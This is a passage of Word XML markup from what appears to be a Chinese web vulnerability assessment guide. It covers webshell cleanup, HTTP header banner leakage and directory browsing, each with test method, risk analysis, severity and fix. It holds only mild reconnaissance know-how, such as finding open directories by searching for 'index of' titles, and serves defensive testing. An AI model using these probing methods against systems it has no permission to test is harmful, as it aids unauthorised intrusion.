      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可借助工具全盘清理入侵痕迹，如</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盾可以扫描</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中的</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00FA1E67" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE073D" w14:textId="3D6883E8" w:rsidR="00CB0B19" w:rsidRPr="003E7C1D" w:rsidRDefault="00CB0B19" w:rsidP="00501D2E">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120A91D9" w14:textId="08A24B00" w:rsidR="00757422" w:rsidRPr="00B73DD5" w:rsidRDefault="00757422" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc498434478"/>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头信息泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="56D5BD61" w14:textId="7BE7D3E9" w:rsidR="00757422" w:rsidRPr="00590B2C"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="007C3BFD" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在服务器返回的</w:t>
      </w:r>
      <w:r w:rsidR="007C3BFD" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="007C3BFD" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头中泄露服务器信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF184A" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="00590B2C"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1B8D8E" w14:textId="263DD164" w:rsidR="002E599C" w:rsidRPr="00590B2C" w:rsidRDefault="002E599C" w:rsidP="00590B2C">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="004D490F" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器的调试窗口中查看</w:t>
      </w:r>
      <w:r w:rsidR="004D490F" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="004D490F" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E3B7DD" w14:textId="1FD119DF" w:rsidR="00757422" w:rsidRPr="00590B2C" w:rsidRDefault="004D490F" w:rsidP="00590B2C">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用代理软件</w:t>
      </w:r>
      <w:r w:rsidR="00322179" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="00322179" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00322179" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00322179" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fiddler</w:t>
      </w:r>
      <w:r w:rsidR="00322179" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截</w:t>
      </w:r>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB290A" w14:textId="0D475F90" w:rsidR="00757422" w:rsidRPr="00590B2C" w:rsidRDefault="00C24790" w:rsidP="00590B2C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00577A8D" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可</w:t>
      </w:r>
      <w:r w:rsidR="008B2003" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过获取服务器</w:t>
      </w:r>
      <w:r w:rsidR="008B2003" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidR="008B2003" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息，针对某个版本存在的漏洞进行定向攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22582D" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="00590B2C"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9D6D6B" w14:textId="4338ABBE" w:rsidR="00757422" w:rsidRPr="00590B2C" w:rsidRDefault="003C407A" w:rsidP="00590B2C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：泄露服务器版本等信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B525EC6" w14:textId="3EFA9AE3" w:rsidR="00757422"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修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00434842" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏或者修改</w:t>
      </w:r>
      <w:r w:rsidR="00434842" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidR="00434842" w:rsidRPr="00590B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidR="00CB0B19" w:rsidRPr="00CB0B19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2658FD50" w14:textId="2F14D27A" w:rsidR="00CB0B19" w:rsidRPr="00590B2C" w:rsidRDefault="00CB0B19" w:rsidP="00590B2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85EEA02" w14:textId="107038FF" w:rsidR="00757422" w:rsidRPr="00B73DD5" w:rsidRDefault="00757422" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc498434479"/>
      <w:r w:rsidRPr="00B73DD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录浏览</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="184BF41C" w14:textId="5CAF385C" w:rsidR="00757422" w:rsidRPr="00F907A7" w:rsidRDefault="00757422" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00C90839" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录浏览漏洞是由于网站存在配置缺陷，存在目录可浏览漏洞，这会导致网站很多隐私文件与目录泄露，比如数据库备份文件、配置文件等，攻击者利用该信息可以更容易得到网站权限，导致网站被黑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BFDA78" w14:textId="72DA7621" w:rsidR="00757422" w:rsidRPr="00F907A7" w:rsidRDefault="00757422" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以利用</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描器扫描</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用进行检测，也可通过搜索，网站标题包</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>含“</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index of</w:t>
      </w:r>
      <w:r w:rsidR="001407C4" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”关键词的网站进行访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF265E" w14:textId="531D3CC9" w:rsidR="00757422" w:rsidRPr="00F907A7" w:rsidRDefault="00C24790" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00770E9E" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者通过访问网站某一目录时，该目录没有默认首页文件或没有正确设置默认首页文件，将会把整个目录结构列出来，将网站结构完全暴露给攻击者；</w:t>
      </w:r>
      <w:r w:rsidR="00770E9E" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00770E9E" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能通过浏览目录结构，访问到某些隐秘文件（如</w:t>
      </w:r>
      <w:r w:rsidR="00770E9E" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHPINFO</w:t>
      </w:r>
      <w:r w:rsidR="00770E9E" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件、服务器探针文件、网站管理员后台访问地址、数据库连接文件等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CFC256" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="00F907A7" w:rsidRDefault="00757422" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F1D15" w14:textId="288C2BE6" w:rsidR="00757422" w:rsidRPr="00F907A7" w:rsidRDefault="00013B76" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00A939F9" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录可以浏览，泄露包含密码、个人信息等敏感文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21498035" w14:textId="247CE11C" w:rsidR="00013B76" w:rsidRPr="00F907A7" w:rsidRDefault="00013B76" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00946565" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录可以浏览，</w:t>
      </w:r>
      <w:r w:rsidR="00471197" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未</w:t>
      </w:r>
      <w:r w:rsidR="00946565" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露包含密码、个人信息等敏感文件</w:t>
      </w:r>
      <w:r w:rsidR="00A939F9" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5050C6C0" w14:textId="5AFB0A68" w:rsidR="00F80308" w:rsidRPr="00F907A7" w:rsidRDefault="00757422" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00F80308" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前存在该漏洞的常见中间件为</w:t>
      </w:r>
      <w:r w:rsidR="00F80308" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r w:rsidR="00F80308" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00F80308" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS,</w:t>
      </w:r>
      <w:r w:rsidR="00F80308" w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下列出其相关的修复方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E5857F" w14:textId="77777777" w:rsidR="00F80308" w:rsidRPr="00F907A7" w:rsidRDefault="00F80308" w:rsidP="00F907A7">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F907A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
